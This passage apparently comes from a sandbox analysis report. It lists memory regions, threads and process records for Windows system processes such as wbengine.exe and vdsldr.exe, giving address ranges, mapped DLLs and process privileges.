"" Region: id = 2209 start_va = 0x1e0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2210 start_va = 0x260000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2211 start_va = 0x360000 end_va = 0x36cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2212 start_va = 0x370000 end_va = 0x370fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 2213 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2214 start_va = 0x410000 end_va = 0x597fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2215 start_va = 0x5a0000 end_va = 0x720fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 2216 start_va = 0x730000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 2217 start_va = 0x840000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 2218 start_va = 0x9f0000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 2219 start_va = 0xa70000 end_va = 0xaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 2220 start_va = 0xb20000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 2221 start_va = 0xc30000 end_va = 0xcaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 2222 start_va = 0xce0000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 2223 start_va = 0xd60000 end_va = 0x102efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2224 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2225 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2226 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2227 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2228 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2229 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2230 start_va = 0xff6e0000 end_va = 0xff853fff monitored = 0 entry_point = 0xff82e448 region_type = mapped_file name = "wbengine.exe" filename = "\\Windows\\System32\\wbengine.exe" (normalized: "c:\\windows\\system32\\wbengine.exe") Region: id = 2231 start_va = 0x7fef6e30000 end_va = 0x7fef6e3bfff monitored = 0 entry_point = 0x7fef6e354cc region_type = mapped_file name = "blb_ps.dll" filename = "\\Windows\\System32\\blb_ps.dll" (normalized: "c:\\windows\\system32\\blb_ps.dll") Region: id = 2232 start_va = 0x7fef7560000 end_va = 0x7fef7568fff monitored = 0 entry_point = 0x7fef756325c region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 2233 start_va = 0x7fef75e0000 end_va = 0x7fef75e9fff monitored = 0 entry_point = 0x7fef75e42bc region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 2234 start_va = 0x7fef96c0000 end_va = 0x7fef970ffff monitored = 0 entry_point = 0x7fef96c1190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 2235 start_va = 0x7fefa380000 end_va = 0x7fefa396fff monitored = 0 entry_point = 0x7fefa381060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 2236 start_va = 0x7fefa3a0000 end_va = 0x7fefa54ffff monitored = 0 entry_point = 0x7fefa3a1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2237 start_va = 0x7fefab20000 end_va = 0x7fefab28fff monitored = 0 entry_point = 0x7fefab23668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 2238 start_va = 0x7fefab30000 end_va = 0x7fefab38fff monitored = 0 entry_point = 0x7fefab31020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 2239 start_va = 0x7fefab40000 end_va = 0x7fefab95fff monitored = 0 entry_point = 0x7fefab41040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 2240 start_va = 0x7fefb0e0000 end_va = 0x7fefb0eefff monitored = 0 entry_point = 0x7fefb0e1040 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2241 start_va = 0x7fefb350000 end_va = 0x7fefb368fff monitored = 0 entry_point = 0x7fefb3511a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2242 start_va = 0x7fefb9a0000 end_va = 0x7fefb9b4fff monitored = 0 entry_point = 0x7fefb9a1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2243 start_va = 0x7fefb9c0000 end_va = 0x7fefb9cbfff monitored = 0 entry_point = 0x7fefb9c18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2244 start_va = 0x7fefb9d0000 end_va = 0x7fefb9e5fff monitored = 0 entry_point = 0x7fefb9d11a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2245 start_va = 0x7fefbc60000 end_va = 0x7fefbc94fff monitored = 0 entry_point = 0x7fefbc61064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2246 start_va = 0x7fefccb0000 end_va = 0x7fefccfbfff monitored = 0 entry_point = 0x7fefccb7950 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2247 start_va = 0x7fefcd70000 end_va = 0x7fefcdb6fff monitored = 0 entry_point = 0x7fefcd71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2248 start_va = 0x7fefce60000 end_va = 0x7fefce8ffff monitored = 0 entry_point = 0x7fefce6194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 2249 start_va = 0x7fefd070000 end_va = 0x7fefd087fff monitored = 0 entry_point = 0x7fefd073b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2250 start_va = 0x7fefd1e0000 end_va = 0x7fefd201fff monitored = 0 entry_point = 0x7fefd1e5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2251 start_va = 0x7fefd310000 end_va = 0x7fefd323fff monitored = 0 entry_point = 0x7fefd314160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 2252 start_va = 0x7fefd570000 end_va = 0x7fefd592fff monitored = 0 entry_point = 0x7fefd571198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2253 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2254 start_va = 0x7fefd760000 end_va = 0x7fefd773fff monitored = 0 entry_point = 0x7fefd7610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2255 start_va = 0x7fefd820000 end_va = 0x7fefd82efff monitored = 0 entry_point = 0x7fefd821020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2256 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2257 start_va = 0x7fefd980000 end_va = 0x7fefd999fff monitored = 0 entry_point = 0x7fefd981558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2258 start_va = 0x7fefd9a0000 end_va = 0x7fefd9d5fff monitored = 0 entry_point = 0x7fefd9a1474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2259 start_va = 0x7fefd9e0000 end_va = 0x7fefdb4cfff monitored = 0 entry_point = 0x7fefd9e10b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2260 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2261 start_va = 0x7fefdc80000 end_va = 0x7fefde56fff monitored = 0 entry_point = 0x7fefdc81010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2262 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2263 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2264 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2265 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2266 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2267 start_va = 0x7feff360000 end_va = 0x7feff3f8fff monitored = 0 entry_point = 0x7feff361c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2268 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2269 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2270 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2271 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2272 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2273 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2274 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2275 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2276 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2277 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2278 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2279 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2280 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2281 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2282 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2283 start_va = 0x380000 end_va = 0x380fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 2284 start_va = 0x7fef4800000 end_va = 0x7fef4820fff monitored = 0 entry_point = 0x7fef4817d2c region_type = mapped_file name = "vds_ps.dll" filename = "\\Windows\\System32\\vds_ps.dll" (normalized: "c:\\windows\\system32\\vds_ps.dll") Region: id = 2429 start_va = 0x7fefb4e0000 end_va = 0x7fefb606fff monitored = 0 entry_point = 0x7fefb4e10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 2430 start_va = 0x7fefd640000 end_va = 0x7fefd664fff monitored = 0 entry_point = 0x7fefd649658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Thread: id = 119 os_tid = 0x5cc Thread: id = 120 os_tid = 0x8d0 Thread: id = 121 os_tid = 0xdb4 Thread: id = 122 os_tid = 0xd90 Thread: id = 123 os_tid = 0xd94 Thread: id = 124 os_tid = 0xd9c Thread: id = 125 os_tid = 0xd98 Thread: id = 139 os_tid = 0x8f4 Process: id = "17" image_name = "vdsldr.exe" filename = "c:\\windows\\system32\\vdsldr.exe" page_root = "0x351a1000" os_pid = "0x568" os_integrity_level = "0x4000" os_privileges = "0x20860100" monitor_reason = "rpc_server" parent_id = "16" os_parent_pid = "0x254" cmd_line = "C:\\Windows\\System32\\vdsldr.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:00071035" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2285 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2286 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2287 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2288 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2289 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2290 start_va = 0x150000 end_va = 0x1b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2291 start_va = 0x1c0000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2292 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 2293 start_va = 0x250000 end_va = 0x25cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2294 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 2295 start_va = 0x290000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2296 start_va = 0x2a0000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 2297 start_va = 0x3a0000 end_va = 0x527fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 2298 start_va = 0x530000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2299 start_va = 0x6c0000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 2300 start_va = 0x7b0000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 2301 start_va = 0x830000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 2302 start_va = 0x9a0000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 2303 start_va = 0xa20000 end_va = 0xceefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2304 start_va = 0xde0000 end_va = 0xe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 2305 start_va = 0xe90000 end_va = 0xf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 2306 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2307 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2308 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2309 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2310 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2311 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2312 start_va = 0xffaf0000 end_va = 0xffaf9fff monitored = 0 entry_point = 0xffaf417c region_type = mapped_file name = "vdsldr.exe" filename = "\\Windows\\System32\\vdsldr.exe" (normalized: "c:\\windows\\system32\\vdsldr.exe") Region: id = 2313 start_va = 0x7fef4450000 end_va = 0x7fef4482fff monitored = 0 entry_point = 0x7fef4474d60 region_type = mapped_file name = "vdsutil.dll" filename = "\\Windows\\System32\\vdsutil.dll" (normalized: "c:\\windows\\system32\\vdsutil.dll") Region: id = 2314 start_va = 0x7fef4800000 end_va = 0x7fef4820fff monitored = 0 entry_point = 0x7fef4817d2c region_type = mapped_file name = "vds_ps.dll" filename = "\\Windows\\System32\\vds_ps.dll" (normalized: "c:\\windows\\system32\\vds_ps.dll") Region: id = 2315 start_va = 0x7fefb350000 end_va = 0x7fefb368fff monitored = 0 entry_point = 0x7fefb3511a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2316 start_va = 0x7fefb9a0000 end_va = 0x7fefb9b4fff monitored = 0 entry_point = 0x7fefb9a1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2317 start_va = 0x7fefb9c0000 end_va = 0x7fefb9cbfff monitored = 0 entry_point = 0x7fefb9c18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2318 start_va = 0x7fefb9d0000 end_va = 0x7fefb9e5fff monitored = 0 entry_point = 0x7fefb9d11a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2319 start_va = 0x7fefcd70000 end_va = 0x7fefcdb6fff monitored = 0 entry_point = 0x7fefcd71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2320 start_va = 0x7fefd070000 end_va = 0x7fefd087fff monitored = 0 entry_point = 0x7fefd073b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2321 start_va = 0x7fefd570000 end_va = 0x7fefd592fff monitored = 0 entry_point = 0x7fefd571198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2322 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2323 start_va = 0x7fefd760000 end_va = 0x7fefd773fff monitored = 0 entry_point = 0x7fefd7610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2324 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2325 start_va = 0x7fefd980000 end_va = 0x7fefd999fff monitored = 0 entry_point = 0x7fefd981558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2326 start_va = 0x7fefd9a0000 end_va = 0x7fefd9d5fff monitored = 0 entry_point = 0x7fefd9a1474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2327 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2328 start_va = 0x7fefdc80000 end_va = 0x7fefde56fff monitored = 0 entry_point = 0x7fefdc81010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2329 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2330 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2331 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2332 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2333 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2334 start_va = 0x7feff360000 end_va = 0x7feff3f8fff monitored = 0 entry_point = 0x7feff361c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2335 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2336 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2337 start_va = 